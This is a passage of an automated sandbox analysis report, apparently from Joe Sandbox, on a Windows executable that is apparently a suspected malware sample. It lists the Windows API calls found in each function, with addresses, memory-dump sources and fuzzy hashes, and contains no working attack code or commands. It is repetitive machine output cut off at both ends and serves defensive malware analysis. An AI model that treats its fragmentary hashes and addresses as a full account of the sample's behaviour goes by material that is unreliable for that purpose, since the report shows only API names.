                                                              • Instruction Fuzzy Hash: 0C41D1316042019FDB14EF14CCA6FADB7A5AF41724F188419F9069B2D2CBB8EC49EB91
                                                              APIs
                                                              • LoadIconW.USER32(00000000,00007F03), ref: 00F73033
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: IconLoad
                                                              • String ID: blank$info$question$stop$warning
                                                              • API String ID: 2457776203-404129466
                                                              • Opcode ID: dd5ceb001f8cd05087053296d2848ef878ecbccf26871524e277670c28f8a202
                                                              • Instruction ID: 0d7f11a19739762f1575f1e258a842b1273b32ba15c57ca71e6ddd3b1a11f646
                                                              • Opcode Fuzzy Hash: dd5ceb001f8cd05087053296d2848ef878ecbccf26871524e277670c28f8a202
                                                              • Instruction Fuzzy Hash: C311053274838ABAE7149A54DC43EAB779C9F15374F20802FF908A6181DBB59F4176A3
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F74312
                                                              • LoadStringW.USER32(00000000), ref: 00F74319
                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F7432F
                                                              • LoadStringW.USER32(00000000), ref: 00F74336
                                                              • _wprintf.LIBCMT ref: 00F7435C
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F7437A
                                                              Strings
                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00F74357
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                              • API String ID: 3648134473-3128320259
                                                              • Opcode ID: eee9f58d0f2ce163ee369e6474d68a73063cd42e2e7d07874b2299f501a0bf8a
                                                              • Instruction ID: 87e48a0d03d911ca723d41e235f449b1ed5640cd13b567e9416e69242d3e14c7
                                                              • Opcode Fuzzy Hash: eee9f58d0f2ce163ee369e6474d68a73063cd42e2e7d07874b2299f501a0bf8a
                                                              • Instruction Fuzzy Hash: 4C018FF390020CBFE75097A0DD89EF6736CDB08301F4000A2B709E2011EA359E896B71
                                                              APIs
                                                                • Part of subcall function 00F12612: GetWindowLongW.USER32(?,000000EB), ref: 00F12623
                                                              • GetSystemMetrics.USER32(0000000F), ref: 00F9D47C
                                                              • GetSystemMetrics.USER32(0000000F), ref: 00F9D49C
                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F9D6D7
                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F9D6F5
                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F9D716
                                                              • ShowWindow.USER32(00000003,00000000), ref: 00F9D735
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00F9D75A
                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00F9D77D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                              • String ID:
                                                              • API String ID: 1211466189-0
                                                              • Opcode ID: 07b1c187eee4c4cf4ab2381b4e568048df3b76feb4ba1b91fdeccf96e35b9c6e
                                                              • Instruction ID: d8f1757257221cb038ae83b387070f4371f981bcea25ae3521eac2cfb3558d54
                                                              • Opcode Fuzzy Hash: 07b1c187eee4c4cf4ab2381b4e568048df3b76feb4ba1b91fdeccf96e35b9c6e
                                                              • Instruction Fuzzy Hash: 66B19A71A00219EFEF18CF68C9C57AD7BB1BF04711F288069EC489B295D734A950EBA1
                                                              APIs
                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F4C1C7,00000004,00000000,00000000,00000000), ref: 00F12ACF
                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00F4C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00F12B17
                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00F4C1C7,00000004,00000000,00000000,00000000), ref: 00F4C21A
                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F4C1C7,00000004,00000000,00000000,00000000), ref: 00F4C286
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow
                                                              • String ID:
                                                              • API String ID: 1268545403-0
                                                              • Opcode ID: 5657d37af06ae2673467ff5301022dec028e69393f94b8d27521d2226f4bef65
                                                              • Instruction ID: cab4c42f9879b47b822383b0dfc2b0d48c7cb221100795d2c916eaae5565a95d
                                                              • Opcode Fuzzy Hash: 5657d37af06ae2673467ff5301022dec028e69393f94b8d27521d2226f4bef65
                                                              • Instruction Fuzzy Hash: 99412131A097809BC7F59BA8CC88BEB7F92AF85320F14841DE44782560C679A9E5F761
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F770DD
                                                                • Part of subcall function 00F30DB6: std::exception::exception.LIBCMT ref: 00F30DEC
                                                                • Part of subcall function 00F30DB6: __CxxThrowException@8.LIBCMT ref: 00F30E01
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F77114
                                                              • EnterCriticalSection.KERNEL32(?), ref: 00F77130
                                                              • _memmove.LIBCMT ref: 00F7717E
                                                              • _memmove.LIBCMT ref: 00F7719B
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00F771AA
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F771BF
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F771DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 256516436-0
                                                              • Opcode ID: 6e34ed5af33039b7a3a919d467ebd2f1b217a6d522bbf5bc142408fff45b70c2
                                                              • Instruction ID: 3187acb99c9261d9e6f5e8598fc0d1cfc5ef7397441112c178befbee9cc578c0
                                                              • Opcode Fuzzy Hash: 6e34ed5af33039b7a3a919d467ebd2f1b217a6d522bbf5bc142408fff45b70c2
                                                              • Instruction Fuzzy Hash: 0B315031A00205EBCF00EFA4DC85AAEB7B8EF45710F1481B6E904DB256DB749E54EBA1
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 00F961EB
                                                              • GetDC.USER32(00000000), ref: 00F961F3
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F961FE
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00F9620A
                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F96246
                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F96257
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F9902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00F96291
                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F962B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                              • String ID:
                                                              • API String ID: 3864802216-0
                                                              • Opcode ID: 496609b7ecab99aa670aabe9f1ac0bc7c260b670e4b7b06b7722553ba7744958
                                                              • Instruction ID: 2eaade6ccce9a84d240028836c3794baab1d7987b8a1f5a35eb1a0af2ae3a035
                                                              • Opcode Fuzzy Hash: 496609b7ecab99aa670aabe9f1ac0bc7c260b670e4b7b06b7722553ba7744958
                                                              • Instruction Fuzzy Hash: 04317F72201214BFEF118F50CC8AFEA3BADEF49765F044066FE08DA191C6759C55DB60
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memcmp
                                                              • String ID:
                                                              • API String ID: 2931989736-0
                                                              • Opcode ID: 0e86f26f3e308cb937f5e813588c18dc71d208e983fb768707c7ef0ab4055c75
                                                              • Instruction ID: 4767fbdd82310b481ccea40437996cd57b8d93179d56f6a68b2a6efe493e2631
                                                              • Opcode Fuzzy Hash: 0e86f26f3e308cb937f5e813588c18dc71d208e983fb768707c7ef0ab4055c75
                                                              • Instruction Fuzzy Hash: 7E21C6A2B012067BE614B615ED42FFB735DAE52378F044020FD04D6647EB69DF51B2A2
                                                              APIs
                                                                • Part of subcall function 00F19837: __itow.LIBCMT ref: 00F19862
                                                                • Part of subcall function 00F19837: __swprintf.LIBCMT ref: 00F198AC
                                                                • Part of subcall function 00F2FC86: _wcscpy.LIBCMT ref: 00F2FCA9
                                                              • _wcstok.LIBCMT ref: 00F7EC94
                                                              • _wcscpy.LIBCMT ref: 00F7ED23
                                                              • _memset.LIBCMT ref: 00F7ED56
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                              • String ID: X
                                                              • API String ID: 774024439-3081909835
                                                              • Opcode ID: de117b322e71f64420e58ed4f7ee9f285797f85419ce42fea1e790bf856c3a2e
                                                              • Instruction ID: aa437c4ab4f8d9d32ed7f96c355003585d3afc459b1e40509ec3e84cc1f9946c
                                                              • Opcode Fuzzy Hash: de117b322e71f64420e58ed4f7ee9f285797f85419ce42fea1e790bf856c3a2e
                                                              • Instruction Fuzzy Hash: 56C182315083419FC714EF24C851A9AB7E4FF89320F04896EF899972A2DB74ED45EB83
                                                              APIs
                                                              • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00F86C00
                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F86C21
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00F86C34
                                                              • htons.WSOCK32(?), ref: 00F86CEA
                                                              • inet_ntoa.WSOCK32(?), ref: 00F86CA7
                                                                • Part of subcall function 00F6A7E9: _strlen.LIBCMT ref: 00F6A7F3
                                                                • Part of subcall function 00F6A7E9: _memmove.LIBCMT ref: 00F6A815
                                                              • _strlen.LIBCMT ref: 00F86D44
                                                              • _memmove.LIBCMT ref: 00F86DAD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                              • String ID:
                                                              • API String ID: 3619996494-0
                                                              • Opcode ID: f2aeacf60cf4a1898faf6ee0e4a7ffefabf3abb88d4de3853e9db0bc67c23e19
                                                              • Instruction ID: 2cb53eabe6ad193f3ea9388515025f8d791afcfcb5b4767250912293fb6068c7
                                                              • Opcode Fuzzy Hash: f2aeacf60cf4a1898faf6ee0e4a7ffefabf3abb88d4de3853e9db0bc67c23e19
                                                              • Instruction Fuzzy Hash: F281E472608300ABC710FB24CC92FEAB7A8AF84724F14491DF555DB292DA74DD45EB92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 22693d2ed8c497d865e1ece1c02bac9c00bebbafb2c93f6cbedf2e53f61d56bd
                                                              • Instruction ID: 050673902aab5039b27e4f24cda91268e8c0b4b3d5b26d930d9a11bbb74c1123
                                                              • Opcode Fuzzy Hash: 22693d2ed8c497d865e1ece1c02bac9c00bebbafb2c93f6cbedf2e53f61d56bd
                                                              • Instruction Fuzzy Hash: A7716F31900109EFDB14CF58CC45AFEBB79FF86720F248159FA15AA251C734AA91EFA4
                                                              APIs
                                                              • IsWindow.USER32(015E86F8), ref: 00F9B3EB
                                                              • IsWindowEnabled.USER32(015E86F8), ref: 00F9B3F7
                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F9B4DB
                                                              • SendMessageW.USER32(015E86F8,000000B0,?,?), ref: 00F9B512
                                                              • IsDlgButtonChecked.USER32(?,?), ref: 00F9B54F
                                                              • GetWindowLongW.USER32(015E86F8,000000EC), ref: 00F9B571
                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F9B589
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                              • String ID:
                                                              • API String ID: 4072528602-0
                                                              • Opcode ID: 5c0e4e11a80aa075dad502a9bbab0401e42a185aee2a0b1d6f88c9b0864175ce
                                                              • Instruction ID: 5183ac1ed186d29657ab43ee7784b4dea858f0b1856221ee1acc8521081762b5
                                                              • Opcode Fuzzy Hash: 5c0e4e11a80aa075dad502a9bbab0401e42a185aee2a0b1d6f88c9b0864175ce
                                                              • Instruction Fuzzy Hash: DC71A034A00208EFEF25DF68E994FBA7BB5EF09320F14415AE945973A2C731A850FB50
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F8F448
                                                              • _memset.LIBCMT ref: 00F8F511
                                                              • ShellExecuteExW.SHELL32(?), ref: 00F8F556
                                                                • Part of subcall function 00F19837: __itow.LIBCMT ref: 00F19862
                                                                • Part of subcall function 00F19837: __swprintf.LIBCMT ref: 00F198AC
                                                                • Part of subcall function 00F2FC86: _wcscpy.LIBCMT ref: 00F2FCA9
                                                              • GetProcessId.KERNEL32(00000000), ref: 00F8F5CD
                                                              • CloseHandle.KERNEL32(00000000), ref: 00F8F5FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                              • String ID: @
                                                              • API String ID: 3522835683-2766056989
                                                              • Opcode ID: 671691290d9f6e9c985b5cad7f032cf3eb94fb0fe2e764411c139ebf301d6ea0
                                                              • Instruction ID: 4ebd7adb15800b47a89d889210d4a97249cb03b0b530e95eced66433866d05e7
                                                              • Opcode Fuzzy Hash: 671691290d9f6e9c985b5cad7f032cf3eb94fb0fe2e764411c139ebf301d6ea0
                                                              • Instruction Fuzzy Hash: 2E619E75A006199FCB04EF64C8919EEBBF5FF49320F148069E855AB351CB34AE45EB90
                                                              APIs
                                                              • GetParent.USER32(?), ref: 00F70F8C
                                                              • GetKeyboardState.USER32(?), ref: 00F70FA1
                                                              • SetKeyboardState.USER32(?), ref: 00F71002
                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F71030
                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F7104F
                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F71095
                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F710B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: 1b247737e9be29399d2c5a7816ccd31c37d1872eb7c8088be6d7062544162160
                                                              • Instruction ID: 8cabcd54bed1e7d9a35ab2b1f49bb0084cda56546f070296a4ae01cac871b0d0
                                                              • Opcode Fuzzy Hash: 1b247737e9be29399d2c5a7816ccd31c37d1872eb7c8088be6d7062544162160
                                                              • Instruction Fuzzy Hash: D451D3609047D579FB3646388C05BB6BEA96B06314F08C58AE1D9858C3C6E89CDCF752
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 00F70DA5
                                                              • GetKeyboardState.USER32(?), ref: 00F70DBA
                                                              • SetKeyboardState.USER32(?), ref: 00F70E1B
                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F70E47
                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F70E64
                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F70EA8
                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F70EC9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: b210350d39b386e16fa4a99b7755a214f2996bc356f9ed6aa3f23ab071da8da9
                                                              • Instruction ID: c46767a93e2126fd7592553c0bfa36a43997f9883b3bc8f1f0771f3d18b85c19
                                                              • Opcode Fuzzy Hash: b210350d39b386e16fa4a99b7755a214f2996bc356f9ed6aa3f23ab071da8da9
                                                              • Instruction Fuzzy Hash: 7451EAA09047D5BDF73287748C45BBA7E999F06310F08C88AF1DC464C2DB95AC98F752
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _wcsncpy$LocalTime
                                                              • String ID:
                                                              • API String ID: 2945705084-0
                                                              • Opcode ID: c17b82cc782098f317d588dc5c5256f394c5625923abca7cb01811eecd5bc078
                                                              • Instruction ID: b6b364628d81f29687a463e14c02f72fc5204fc9d349ab77fe8ac131619be8ee
                                                              • Opcode Fuzzy Hash: c17b82cc782098f317d588dc5c5256f394c5625923abca7cb01811eecd5bc078
                                                              • Instruction Fuzzy Hash: E541C675D1061876CB51EBB48C469CFB3B89F04720F508956E909E3221FB38F355E7A6
                                                              APIs
